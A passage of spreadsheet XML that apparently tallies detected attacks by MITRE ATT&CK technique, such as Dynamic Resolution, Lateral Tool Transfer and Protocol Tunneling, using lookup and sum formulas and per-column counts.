        <v>1 (26)</v>
      </c>
      <c r="G60" s="292"/>
      <c r="H60" s="322"/>
      <c r="I60" s="322"/>
      <c r="J60" s="12"/>
      <c r="K60" s="13"/>
      <c r="L60" s="394"/>
      <c r="M60" s="322"/>
      <c r="N60" s="322"/>
      <c r="O60" s="322"/>
      <c r="P60" s="12"/>
      <c r="Q60" s="13"/>
      <c r="R60" s="394"/>
      <c r="S60" s="292"/>
      <c r="T60" s="322"/>
      <c r="U60" s="322"/>
      <c r="V60" s="12"/>
      <c r="W60" s="13"/>
      <c r="X60" s="394"/>
      <c r="Y60" s="392"/>
      <c r="Z60" s="392"/>
      <c r="AA60" s="322"/>
      <c r="AB60" s="392"/>
      <c r="AC60" s="16"/>
      <c r="AD60" s="394"/>
      <c r="AE60" s="392"/>
      <c r="AF60" s="392"/>
      <c r="AG60" s="322"/>
      <c r="AH60" s="392"/>
      <c r="AI60" s="16"/>
      <c r="AJ60" s="394"/>
      <c r="AK60" s="392"/>
      <c r="AL60" s="392"/>
      <c r="AM60" s="322"/>
      <c r="AN60" s="392"/>
      <c r="AO60" s="16"/>
      <c r="AP60" s="394"/>
      <c r="AQ60" s="292"/>
      <c r="AR60" s="322"/>
      <c r="AS60" s="322"/>
      <c r="AT60" s="12"/>
      <c r="AU60" s="13"/>
      <c r="AV60" s="394"/>
      <c r="AW60" s="392"/>
      <c r="AX60" s="392"/>
      <c r="AY60" s="322"/>
      <c r="BA60" s="16"/>
      <c r="BB60" s="394"/>
      <c r="BC60" s="292"/>
      <c r="BD60" s="322"/>
      <c r="BE60" s="322"/>
      <c r="BF60" s="12"/>
      <c r="BG60" s="13"/>
      <c r="BH60" s="394"/>
      <c r="BI60" s="292">
        <v>0</v>
      </c>
      <c r="BJ60" s="322">
        <v>0</v>
      </c>
      <c r="BK60" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL60" s="12">
        <v>0</v>
      </c>
      <c r="BM60" s="13">
        <v>0</v>
      </c>
      <c r="BN60" s="394">
        <v>0</v>
      </c>
      <c r="BO60" s="292">
        <v>6</v>
      </c>
      <c r="BP60" s="322">
        <v>6</v>
      </c>
      <c r="BQ60" s="322" t="str">
        <f t="shared" si="1"/>
        <v>6 (6)</v>
      </c>
      <c r="BR60" s="12">
        <v>0</v>
      </c>
      <c r="BS60" s="12">
        <v>2</v>
      </c>
      <c r="BT60" s="13">
        <v>1</v>
      </c>
      <c r="BU60" s="394">
        <v>6</v>
      </c>
      <c r="BV60" s="292">
        <v>0</v>
      </c>
      <c r="BW60" s="322">
        <v>0</v>
      </c>
      <c r="BX60" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY60" s="12">
        <v>0</v>
      </c>
      <c r="BZ60" s="13">
        <v>0</v>
      </c>
      <c r="CA60" s="394">
        <v>0</v>
      </c>
      <c r="CB60" s="292">
        <v>0</v>
      </c>
      <c r="CC60" s="322">
        <v>0</v>
      </c>
      <c r="CD60" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE60" s="12">
        <v>0</v>
      </c>
      <c r="CF60" s="12">
        <v>0</v>
      </c>
      <c r="CG60" s="13">
        <v>0</v>
      </c>
      <c r="CH60" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:86" ht="15" customHeight="1">
      <c r="A61" s="4">
        <f t="shared" si="3"/>
        <v>59</v>
      </c>
      <c r="B61" s="4" t="str">
        <f>IFERROR(VLOOKUP(A61,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1568</v>
      </c>
      <c r="C61" s="493" t="str">
        <f>IFERROR(VLOOKUP(B61,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Dynamic Resolution</v>
      </c>
      <c r="D61" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B61)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E61" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>267</v>
      </c>
      <c r="F61" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (267)</v>
      </c>
      <c r="G61" s="292"/>
      <c r="H61" s="322"/>
      <c r="I61" s="322"/>
      <c r="J61" s="12"/>
      <c r="K61" s="13"/>
      <c r="L61" s="394"/>
      <c r="M61" s="322"/>
      <c r="N61" s="322"/>
      <c r="O61" s="322"/>
      <c r="P61" s="12"/>
      <c r="Q61" s="13"/>
      <c r="R61" s="394"/>
      <c r="S61" s="292"/>
      <c r="T61" s="322"/>
      <c r="U61" s="322"/>
      <c r="V61" s="12"/>
      <c r="W61" s="13"/>
      <c r="X61" s="394"/>
      <c r="Y61" s="392"/>
      <c r="Z61" s="392"/>
      <c r="AA61" s="322"/>
      <c r="AB61" s="392"/>
      <c r="AC61" s="16"/>
      <c r="AD61" s="394"/>
      <c r="AE61" s="392"/>
      <c r="AF61" s="392"/>
      <c r="AG61" s="322"/>
      <c r="AH61" s="392"/>
      <c r="AI61" s="16"/>
      <c r="AJ61" s="394"/>
      <c r="AK61" s="392"/>
      <c r="AL61" s="392"/>
      <c r="AM61" s="322"/>
      <c r="AN61" s="392"/>
      <c r="AO61" s="16"/>
      <c r="AP61" s="394"/>
      <c r="AQ61" s="292"/>
      <c r="AR61" s="322"/>
      <c r="AS61" s="322"/>
      <c r="AT61" s="12"/>
      <c r="AU61" s="13"/>
      <c r="AV61" s="394"/>
      <c r="AW61" s="392"/>
      <c r="AX61" s="392"/>
      <c r="AY61" s="322"/>
      <c r="BA61" s="16"/>
      <c r="BB61" s="394"/>
      <c r="BC61" s="292"/>
      <c r="BD61" s="322"/>
      <c r="BE61" s="322"/>
      <c r="BF61" s="12"/>
      <c r="BG61" s="13"/>
      <c r="BH61" s="394"/>
      <c r="BI61" s="292">
        <v>0</v>
      </c>
      <c r="BJ61" s="322">
        <v>0</v>
      </c>
      <c r="BK61" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL61" s="12">
        <v>0</v>
      </c>
      <c r="BM61" s="13">
        <v>0</v>
      </c>
      <c r="BN61" s="394">
        <v>0</v>
      </c>
      <c r="BO61" s="292">
        <v>266</v>
      </c>
      <c r="BP61" s="322">
        <v>266</v>
      </c>
      <c r="BQ61" s="322" t="str">
        <f t="shared" si="1"/>
        <v>266 (266)</v>
      </c>
      <c r="BR61" s="12">
        <v>0</v>
      </c>
      <c r="BS61" s="12">
        <v>5</v>
      </c>
      <c r="BT61" s="13">
        <v>1</v>
      </c>
      <c r="BU61" s="394">
        <v>266</v>
      </c>
      <c r="BV61" s="292">
        <v>0</v>
      </c>
      <c r="BW61" s="322">
        <v>0</v>
      </c>
      <c r="BX61" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY61" s="12">
        <v>0</v>
      </c>
      <c r="BZ61" s="13">
        <v>0</v>
      </c>
      <c r="CA61" s="394">
        <v>0</v>
      </c>
      <c r="CB61" s="292">
        <v>0</v>
      </c>
      <c r="CC61" s="322">
        <v>0</v>
      </c>
      <c r="CD61" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE61" s="12">
        <v>0</v>
      </c>
      <c r="CF61" s="12">
        <v>0</v>
      </c>
      <c r="CG61" s="13">
        <v>0</v>
      </c>
      <c r="CH61" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="62" spans="1:86" ht="15" customHeight="1">
      <c r="A62" s="4">
        <f t="shared" si="3"/>
        <v>60</v>
      </c>
      <c r="B62" s="4" t="str">
        <f>IFERROR(VLOOKUP(A62,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1569</v>
      </c>
      <c r="C62" s="493" t="str">
        <f>IFERROR(VLOOKUP(B62,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>System Services</v>
      </c>
      <c r="D62" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B62)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E62" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>17</v>
      </c>
      <c r="F62" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (17)</v>
      </c>
      <c r="G62" s="292"/>
      <c r="H62" s="322"/>
      <c r="I62" s="322"/>
      <c r="J62" s="12"/>
      <c r="K62" s="13"/>
      <c r="L62" s="394"/>
      <c r="M62" s="322"/>
      <c r="N62" s="322"/>
      <c r="O62" s="322"/>
      <c r="P62" s="12"/>
      <c r="Q62" s="13"/>
      <c r="R62" s="394"/>
      <c r="S62" s="292"/>
      <c r="T62" s="322"/>
      <c r="U62" s="322"/>
      <c r="V62" s="12"/>
      <c r="W62" s="13"/>
      <c r="X62" s="394"/>
      <c r="Y62" s="392"/>
      <c r="Z62" s="392"/>
      <c r="AA62" s="322"/>
      <c r="AB62" s="392"/>
      <c r="AC62" s="16"/>
      <c r="AD62" s="394"/>
      <c r="AE62" s="392"/>
      <c r="AF62" s="392"/>
      <c r="AG62" s="322"/>
      <c r="AH62" s="392"/>
      <c r="AI62" s="16"/>
      <c r="AJ62" s="394"/>
      <c r="AK62" s="392"/>
      <c r="AL62" s="392"/>
      <c r="AM62" s="322"/>
      <c r="AN62" s="392"/>
      <c r="AO62" s="16"/>
      <c r="AP62" s="394"/>
      <c r="AQ62" s="292"/>
      <c r="AR62" s="322"/>
      <c r="AS62" s="322"/>
      <c r="AT62" s="12"/>
      <c r="AU62" s="13"/>
      <c r="AV62" s="394"/>
      <c r="AW62" s="392"/>
      <c r="AX62" s="392"/>
      <c r="AY62" s="322"/>
      <c r="BA62" s="16"/>
      <c r="BB62" s="394"/>
      <c r="BC62" s="292"/>
      <c r="BD62" s="322"/>
      <c r="BE62" s="322"/>
      <c r="BF62" s="12"/>
      <c r="BG62" s="13"/>
      <c r="BH62" s="394"/>
      <c r="BI62" s="292">
        <v>0</v>
      </c>
      <c r="BJ62" s="322">
        <v>0</v>
      </c>
      <c r="BK62" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL62" s="12">
        <v>0</v>
      </c>
      <c r="BM62" s="13">
        <v>0</v>
      </c>
      <c r="BN62" s="394">
        <v>0</v>
      </c>
      <c r="BO62" s="292">
        <v>10</v>
      </c>
      <c r="BP62" s="322">
        <v>10</v>
      </c>
      <c r="BQ62" s="322" t="str">
        <f t="shared" si="1"/>
        <v>10 (10)</v>
      </c>
      <c r="BR62" s="12">
        <v>0</v>
      </c>
      <c r="BS62" s="12">
        <v>6</v>
      </c>
      <c r="BT62" s="13">
        <v>1</v>
      </c>
      <c r="BU62" s="394">
        <v>8</v>
      </c>
      <c r="BV62" s="292">
        <v>0</v>
      </c>
      <c r="BW62" s="322">
        <v>0</v>
      </c>
      <c r="BX62" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY62" s="12">
        <v>0</v>
      </c>
      <c r="BZ62" s="13">
        <v>0</v>
      </c>
      <c r="CA62" s="394">
        <v>0</v>
      </c>
      <c r="CB62" s="292">
        <v>0</v>
      </c>
      <c r="CC62" s="322">
        <v>0</v>
      </c>
      <c r="CD62" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE62" s="12">
        <v>0</v>
      </c>
      <c r="CF62" s="12">
        <v>0</v>
      </c>
      <c r="CG62" s="13">
        <v>0</v>
      </c>
      <c r="CH62" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="63" spans="1:86" ht="15" customHeight="1">
      <c r="A63" s="4">
        <f t="shared" si="3"/>
        <v>61</v>
      </c>
      <c r="B63" s="4" t="str">
        <f>IFERROR(VLOOKUP(A63,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1570</v>
      </c>
      <c r="C63" s="493" t="str">
        <f>IFERROR(VLOOKUP(B63,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Lateral Tool Transfer</v>
      </c>
      <c r="D63" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B63)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E63" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>7</v>
      </c>
      <c r="F63" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (7)</v>
      </c>
      <c r="G63" s="292"/>
      <c r="H63" s="322"/>
      <c r="I63" s="322"/>
      <c r="J63" s="12"/>
      <c r="K63" s="13"/>
      <c r="L63" s="394"/>
      <c r="M63" s="322"/>
      <c r="N63" s="322"/>
      <c r="O63" s="322"/>
      <c r="P63" s="12"/>
      <c r="Q63" s="13"/>
      <c r="R63" s="394"/>
      <c r="S63" s="292"/>
      <c r="T63" s="322"/>
      <c r="U63" s="322"/>
      <c r="V63" s="12"/>
      <c r="W63" s="13"/>
      <c r="X63" s="394"/>
      <c r="Y63" s="392"/>
      <c r="Z63" s="392"/>
      <c r="AA63" s="322"/>
      <c r="AB63" s="392"/>
      <c r="AC63" s="16"/>
      <c r="AD63" s="394"/>
      <c r="AE63" s="392"/>
      <c r="AF63" s="392"/>
      <c r="AG63" s="322"/>
      <c r="AH63" s="392"/>
      <c r="AI63" s="16"/>
      <c r="AJ63" s="394"/>
      <c r="AK63" s="392"/>
      <c r="AL63" s="392"/>
      <c r="AM63" s="322"/>
      <c r="AN63" s="392"/>
      <c r="AO63" s="16"/>
      <c r="AP63" s="394"/>
      <c r="AQ63" s="292"/>
      <c r="AR63" s="322"/>
      <c r="AS63" s="322"/>
      <c r="AT63" s="12"/>
      <c r="AU63" s="13"/>
      <c r="AV63" s="394"/>
      <c r="AW63" s="392"/>
      <c r="AX63" s="392"/>
      <c r="AY63" s="322"/>
      <c r="BA63" s="16"/>
      <c r="BB63" s="394"/>
      <c r="BC63" s="292"/>
      <c r="BD63" s="322"/>
      <c r="BE63" s="322"/>
      <c r="BF63" s="12"/>
      <c r="BG63" s="13"/>
      <c r="BH63" s="394"/>
      <c r="BI63" s="292">
        <v>2</v>
      </c>
      <c r="BJ63" s="322">
        <v>1</v>
      </c>
      <c r="BK63" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (2)</v>
      </c>
      <c r="BL63" s="12">
        <v>1</v>
      </c>
      <c r="BM63" s="13">
        <v>1</v>
      </c>
      <c r="BN63" s="394">
        <v>1</v>
      </c>
      <c r="BO63" s="292">
        <v>2</v>
      </c>
      <c r="BP63" s="322">
        <v>1</v>
      </c>
      <c r="BQ63" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (2)</v>
      </c>
      <c r="BR63" s="12">
        <v>1</v>
      </c>
      <c r="BS63" s="12">
        <v>0</v>
      </c>
      <c r="BT63" s="13">
        <v>1</v>
      </c>
      <c r="BU63" s="394">
        <v>1</v>
      </c>
      <c r="BV63" s="292">
        <v>0</v>
      </c>
      <c r="BW63" s="322">
        <v>0</v>
      </c>
      <c r="BX63" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY63" s="12">
        <v>0</v>
      </c>
      <c r="BZ63" s="13">
        <v>0</v>
      </c>
      <c r="CA63" s="394">
        <v>0</v>
      </c>
      <c r="CB63" s="292">
        <v>0</v>
      </c>
      <c r="CC63" s="322">
        <v>0</v>
      </c>
      <c r="CD63" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE63" s="12">
        <v>0</v>
      </c>
      <c r="CF63" s="12">
        <v>0</v>
      </c>
      <c r="CG63" s="13">
        <v>0</v>
      </c>
      <c r="CH63" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:86" ht="15" customHeight="1">
      <c r="A64" s="4">
        <f t="shared" si="3"/>
        <v>62</v>
      </c>
      <c r="B64" s="4" t="str">
        <f>IFERROR(VLOOKUP(A64,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1571</v>
      </c>
      <c r="C64" s="4" t="str">
        <f>IFERROR(VLOOKUP(B64,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Non-Standard Port</v>
      </c>
      <c r="D64" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B64)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E64" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F64" s="286" t="str">
        <f t="shared" si="4"/>
        <v>1 (1)</v>
      </c>
      <c r="G64" s="292"/>
      <c r="H64" s="322"/>
      <c r="I64" s="322"/>
      <c r="J64" s="12"/>
      <c r="K64" s="13"/>
      <c r="L64" s="394"/>
      <c r="M64" s="322"/>
      <c r="N64" s="322"/>
      <c r="O64" s="322"/>
      <c r="P64" s="12"/>
      <c r="Q64" s="13"/>
      <c r="R64" s="394"/>
      <c r="S64" s="292"/>
      <c r="T64" s="322"/>
      <c r="U64" s="322"/>
      <c r="V64" s="12"/>
      <c r="W64" s="13"/>
      <c r="X64" s="394"/>
      <c r="Y64" s="392"/>
      <c r="Z64" s="392"/>
      <c r="AA64" s="322"/>
      <c r="AB64" s="392"/>
      <c r="AC64" s="16"/>
      <c r="AD64" s="394"/>
      <c r="AE64" s="392"/>
      <c r="AF64" s="392"/>
      <c r="AG64" s="322"/>
      <c r="AH64" s="392"/>
      <c r="AI64" s="16"/>
      <c r="AJ64" s="394"/>
      <c r="AK64" s="392"/>
      <c r="AL64" s="392"/>
      <c r="AM64" s="322"/>
      <c r="AN64" s="392"/>
      <c r="AO64" s="16"/>
      <c r="AP64" s="394"/>
      <c r="AQ64" s="292"/>
      <c r="AR64" s="322"/>
      <c r="AS64" s="322"/>
      <c r="AT64" s="12"/>
      <c r="AU64" s="13"/>
      <c r="AV64" s="394"/>
      <c r="AW64" s="392"/>
      <c r="AX64" s="392"/>
      <c r="AY64" s="322"/>
      <c r="BA64" s="16"/>
      <c r="BB64" s="394"/>
      <c r="BC64" s="292"/>
      <c r="BD64" s="322"/>
      <c r="BE64" s="322"/>
      <c r="BF64" s="12"/>
      <c r="BG64" s="13"/>
      <c r="BH64" s="394"/>
      <c r="BI64" s="292">
        <v>0</v>
      </c>
      <c r="BJ64" s="322">
        <v>0</v>
      </c>
      <c r="BK64" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL64" s="12">
        <v>0</v>
      </c>
      <c r="BM64" s="13">
        <v>0</v>
      </c>
      <c r="BN64" s="394">
        <v>0</v>
      </c>
      <c r="BO64" s="292">
        <v>1</v>
      </c>
      <c r="BP64" s="322">
        <v>1</v>
      </c>
      <c r="BQ64" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="BR64" s="12">
        <v>0</v>
      </c>
      <c r="BS64" s="12">
        <v>1</v>
      </c>
      <c r="BT64" s="13">
        <v>1</v>
      </c>
      <c r="BU64" s="394">
        <v>1</v>
      </c>
      <c r="BV64" s="292">
        <v>0</v>
      </c>
      <c r="BW64" s="322">
        <v>0</v>
      </c>
      <c r="BX64" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY64" s="12">
        <v>0</v>
      </c>
      <c r="BZ64" s="13">
        <v>0</v>
      </c>
      <c r="CA64" s="394">
        <v>0</v>
      </c>
      <c r="CB64" s="292">
        <v>0</v>
      </c>
      <c r="CC64" s="322">
        <v>0</v>
      </c>
      <c r="CD64" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE64" s="12">
        <v>0</v>
      </c>
      <c r="CF64" s="12">
        <v>0</v>
      </c>
      <c r="CG64" s="13">
        <v>0</v>
      </c>
      <c r="CH64" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="65" spans="1:98" ht="15" customHeight="1">
      <c r="A65" s="4">
        <f t="shared" si="3"/>
        <v>63</v>
      </c>
      <c r="B65" s="4" t="str">
        <f>IFERROR(VLOOKUP(A65,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1572</v>
      </c>
      <c r="C65" s="4" t="str">
        <f>IFERROR(VLOOKUP(B65,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Protocol Tunneling</v>
      </c>
      <c r="D65" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B65)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E65" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F65" s="286" t="str">
        <f t="shared" si="4"/>
        <v>1 (3)</v>
      </c>
      <c r="G65" s="292"/>
      <c r="H65" s="322"/>
      <c r="I65" s="322"/>
      <c r="J65" s="12"/>
      <c r="K65" s="13"/>
      <c r="L65" s="394"/>
      <c r="M65" s="322"/>
      <c r="N65" s="322"/>
      <c r="O65" s="322"/>
      <c r="P65" s="12"/>
      <c r="Q65" s="13"/>
      <c r="R65" s="394"/>
      <c r="S65" s="292"/>
      <c r="T65" s="322"/>
      <c r="U65" s="322"/>
      <c r="V65" s="12"/>
      <c r="W65" s="13"/>
      <c r="X65" s="394"/>
      <c r="Y65" s="392"/>
      <c r="Z65" s="392"/>
      <c r="AA65" s="322"/>
      <c r="AB65" s="392"/>
      <c r="AC65" s="16"/>
      <c r="AD65" s="394"/>
      <c r="AE65" s="392"/>
      <c r="AF65" s="392"/>
      <c r="AG65" s="322"/>
      <c r="AH65" s="392"/>
      <c r="AI65" s="16"/>
      <c r="AJ65" s="394"/>
      <c r="AK65" s="392"/>
      <c r="AL65" s="392"/>
      <c r="AM65" s="322"/>
      <c r="AN65" s="392"/>
      <c r="AO65" s="16"/>
      <c r="AP65" s="394"/>
      <c r="AQ65" s="292"/>
      <c r="AR65" s="322"/>
      <c r="AS65" s="322"/>
      <c r="AT65" s="12"/>
      <c r="AU65" s="13"/>
      <c r="AV65" s="394"/>
      <c r="AW65" s="392"/>
      <c r="AX65" s="392"/>
      <c r="AY65" s="322"/>
      <c r="BA65" s="16"/>
      <c r="BB65" s="394"/>
      <c r="BC65" s="292"/>
      <c r="BD65" s="322"/>
      <c r="BE65" s="322"/>
      <c r="BF65" s="12"/>
      <c r="BG65" s="13"/>
      <c r="BH65" s="394"/>
      <c r="BI65" s="292">
        <v>3</v>
      </c>
      <c r="BJ65" s="322">
        <v>2</v>
      </c>
      <c r="BK65" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (3)</v>
      </c>
      <c r="BL65" s="12">
        <v>2</v>
      </c>
      <c r="BM65" s="13">
        <v>1</v>
      </c>
      <c r="BN65" s="394">
        <v>1</v>
      </c>
      <c r="BO65" s="292">
        <v>4</v>
      </c>
      <c r="BP65" s="322">
        <v>3</v>
      </c>
      <c r="BQ65" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (4)</v>
      </c>
      <c r="BR65" s="12">
        <v>2</v>
      </c>
      <c r="BS65" s="12">
        <v>1</v>
      </c>
      <c r="BT65" s="13">
        <v>1</v>
      </c>
      <c r="BU65" s="394">
        <v>2</v>
      </c>
      <c r="BV65" s="292">
        <v>0</v>
      </c>
      <c r="BW65" s="322">
        <v>0</v>
      </c>
      <c r="BX65" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY65" s="12">
        <v>0</v>
      </c>
      <c r="BZ65" s="13">
        <v>0</v>
      </c>
      <c r="CA65" s="394">
        <v>0</v>
      </c>
      <c r="CB65" s="292">
        <v>0</v>
      </c>
      <c r="CC65" s="322">
        <v>0</v>
      </c>
      <c r="CD65" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE65" s="12">
        <v>0</v>
      </c>
      <c r="CF65" s="12">
        <v>0</v>
      </c>
      <c r="CG65" s="13">
        <v>0</v>
      </c>
      <c r="CH65" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="66" spans="1:98" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A66" s="4">
        <f t="shared" si="3"/>
        <v>64</v>
      </c>
      <c r="B66" s="4" t="str">
        <f>IFERROR(VLOOKUP(A66,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1573</v>
      </c>
      <c r="C66" s="4" t="str">
        <f>IFERROR(VLOOKUP(B66,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Encrypted Channel</v>
      </c>
      <c r="D66" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B66)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E66" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F66" s="286" t="str">
        <f t="shared" si="4"/>
        <v>1 (2)</v>
      </c>
      <c r="G66" s="292"/>
      <c r="H66" s="322"/>
      <c r="I66" s="322"/>
      <c r="J66" s="12"/>
      <c r="K66" s="13"/>
      <c r="L66" s="394"/>
      <c r="M66" s="322"/>
      <c r="N66" s="322"/>
      <c r="O66" s="322"/>
      <c r="P66" s="12"/>
      <c r="Q66" s="13"/>
      <c r="R66" s="394"/>
      <c r="S66" s="292"/>
      <c r="T66" s="322"/>
      <c r="U66" s="322"/>
      <c r="V66" s="12"/>
      <c r="W66" s="13"/>
      <c r="X66" s="394"/>
      <c r="Y66" s="392"/>
      <c r="Z66" s="392"/>
      <c r="AA66" s="322"/>
      <c r="AB66" s="392"/>
      <c r="AC66" s="16"/>
      <c r="AD66" s="394"/>
      <c r="AE66" s="392"/>
      <c r="AF66" s="392"/>
      <c r="AG66" s="322"/>
      <c r="AH66" s="392"/>
      <c r="AI66" s="16"/>
      <c r="AJ66" s="394"/>
      <c r="AK66" s="392"/>
      <c r="AL66" s="392"/>
      <c r="AM66" s="322"/>
      <c r="AN66" s="392"/>
      <c r="AO66" s="16"/>
      <c r="AP66" s="394"/>
      <c r="AQ66" s="292"/>
      <c r="AR66" s="322"/>
      <c r="AS66" s="322"/>
      <c r="AT66" s="12"/>
      <c r="AU66" s="13"/>
      <c r="AV66" s="394"/>
      <c r="AW66" s="392"/>
      <c r="AX66" s="392"/>
      <c r="AY66" s="322"/>
      <c r="AZ66" s="4"/>
      <c r="BA66" s="16"/>
      <c r="BB66" s="394"/>
      <c r="BC66" s="292"/>
      <c r="BD66" s="322"/>
      <c r="BE66" s="322"/>
      <c r="BF66" s="12"/>
      <c r="BG66" s="13"/>
      <c r="BH66" s="394"/>
      <c r="BI66" s="292">
        <v>0</v>
      </c>
      <c r="BJ66" s="322">
        <v>0</v>
      </c>
      <c r="BK66" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL66" s="12">
        <v>0</v>
      </c>
      <c r="BM66" s="13">
        <v>0</v>
      </c>
      <c r="BN66" s="394">
        <v>0</v>
      </c>
      <c r="BO66" s="292">
        <v>1</v>
      </c>
      <c r="BP66" s="322">
        <v>1</v>
      </c>
      <c r="BQ66" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="BR66" s="12">
        <v>0</v>
      </c>
      <c r="BS66" s="12">
        <v>1</v>
      </c>
      <c r="BT66" s="13">
        <v>1</v>
      </c>
      <c r="BU66" s="394">
        <v>1</v>
      </c>
      <c r="BV66" s="292">
        <v>0</v>
      </c>
      <c r="BW66" s="322">
        <v>0</v>
      </c>
      <c r="BX66" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY66" s="12">
        <v>0</v>
      </c>
      <c r="BZ66" s="13">
        <v>0</v>
      </c>
      <c r="CA66" s="394">
        <v>0</v>
      </c>
      <c r="CB66" s="292">
        <v>0</v>
      </c>
      <c r="CC66" s="322">
        <v>0</v>
      </c>
      <c r="CD66" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE66" s="12">
        <v>0</v>
      </c>
      <c r="CF66" s="12">
        <v>0</v>
      </c>
      <c r="CG66" s="13">
        <v>0</v>
      </c>
      <c r="CH66" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:98" ht="15" customHeight="1">
      <c r="A67" s="4">
        <f t="shared" si="3"/>
